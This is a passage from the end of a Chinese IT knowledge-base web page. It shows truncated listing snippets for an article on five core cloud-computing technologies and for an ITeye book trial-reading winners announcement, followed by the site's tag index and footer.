<a class="tag" taget="_blank" href="/search/%E4%BA%91%E8%AE%A1%E7%AE%97/1.htm">云计算</a><a class="tag" taget="_blank" href="/search/%E4%BA%91%E5%B9%B3%E5%8F%B0/1.htm">云平台</a><a class="tag" taget="_blank" href="/search/%E6%99%BA%E5%9F%8E%E4%BA%91/1.htm">智城云</a>
                                    <div>云计算平台最重要的五项技术 
 
 
 
1、云服务器 
 
 
云服务器提供简单高效，处理能力可弹性伸缩的计算服务，支持国内领先的云计算技术和大规模分布存储技术，使您的系统更稳定、数据更安全、传输更快速、部署更灵活。 
 
 
特性 
 
机型丰富 
 
通过高性能服务器虚拟化为云服务器，提供丰富配置类型虚拟机，极大简化数据存储、数据库搭建、web服务器搭建等工作； 
 
仅需要几分钟，根据CP</div>
                                </li>
                                <li><a href="/article/3721.htm"
                                       title="《京东技术解密》有奖试读获奖名单公布" target="_blank">《京东技术解密》有奖试读获奖名单公布</a>
                                    <span class="text-muted">ITeye管理员</span>
<a class="tag" taget="_blank" href="/search/%E6%B4%BB%E5%8A%A8/1.htm">活动</a>
                                    <div>ITeye携手博文视点举办的12月技术图书有奖试读活动已圆满结束，非常感谢广大用户对本次活动的关注与参与。&nbsp; 
 
 
12月试读活动回顾： 
http://webmaster.iteye.com/blog/2164754 
 
 
本次技术图书试读活动获奖名单及相应作品如下： 
 
 
一等奖（两名） 
 
 
 Microhardest：http://microhardest.ite</div>
                                </li>
                </ul>
            </div>
        </div>
    </div>

<div>
    <div class="container">
        <div class="indexes">
            <strong>按字母分类：</strong>
            <a href="/tags/A/1.htm" target="_blank">A</a><a href="/tags/B/1.htm" target="_blank">B</a><a href="/tags/C/1.htm" target="_blank">C</a><a
                href="/tags/D/1.htm" target="_blank">D</a><a href="/tags/E/1.htm" target="_blank">E</a><a href="/tags/F/1.htm" target="_blank">F</a><a
                href="/tags/G/1.htm" target="_blank">G</a><a href="/tags/H/1.htm" target="_blank">H</a><a href="/tags/I/1.htm" target="_blank">I</a><a
                href="/tags/J/1.htm" target="_blank">J</a><a href="/tags/K/1.htm" target="_blank">K</a><a href="/tags/L/1.htm" target="_blank">L</a><a
                href="/tags/M/1.htm" target="_blank">M</a><a href="/tags/N/1.htm" target="_blank">N</a><a href="/tags/O/1.htm" target="_blank">O</a><a
                href="/tags/P/1.htm" target="_blank">P</a><a href="/tags/Q/1.htm" target="_blank">Q</a><a href="/tags/R/1.htm" target="_blank">R</a><a
                href="/tags/S/1.htm" target="_blank">S</a><a href="/tags/T/1.htm" target="_blank">T</a><a href="/tags/U/1.htm" target="_blank">U</a><a
                href="/tags/V/1.htm" target="_blank">V</a><a href="/tags/W/1.htm" target="_blank">W</a><a href="/tags/X/1.htm" target="_blank">X</a><a
                href="/tags/Y/1.htm" target="_blank">Y</a><a href="/tags/Z/1.htm" target="_blank">Z</a><a href="/tags/0/1.htm" target="_blank">其他</a>
        </div>
    </div>
</div>
<footer id="footer" class="mb30 mt30">
    <div class="container">
        <div class="footBglm">
            <a target="_blank" href="/">首页</a> -
            <a target="_blank" href="/custom/about.htm">关于我们</a> -
            <a target="_blank" href="/search/Java/1.htm">站内搜索</a> -
            <a target="_blank" href="/sitemap.txt">Sitemap</a> -
            <a target="_blank" href="/custom/delete.htm">侵权投诉</a>
        </div>
        <div class="copyright">版权所有 IT知识库 CopyRight © 2000-2050 E-COM-NET.COM , All Rights Reserved.
<!--            <a href="https://beian.miit.gov.cn/" rel="nofollow" target="_blank">京ICP备09083238号</a><br>-->
        </div>
    </div>
</footer>
<!-- 代码高亮 -->
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shCore.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shLegacy.js"></script>
<script type="text/javascript" src="/static/syntaxhighlighter/scripts/shAutoloader.js"></script>
<link type="text/css" rel="stylesheet" href="/static/syntaxhighlighter/styles/shCoreDefault.css"/>
<script type="text/javascript" src="/static/syntaxhighlighter/src/my_start_1.js"></script>





</body>

</html>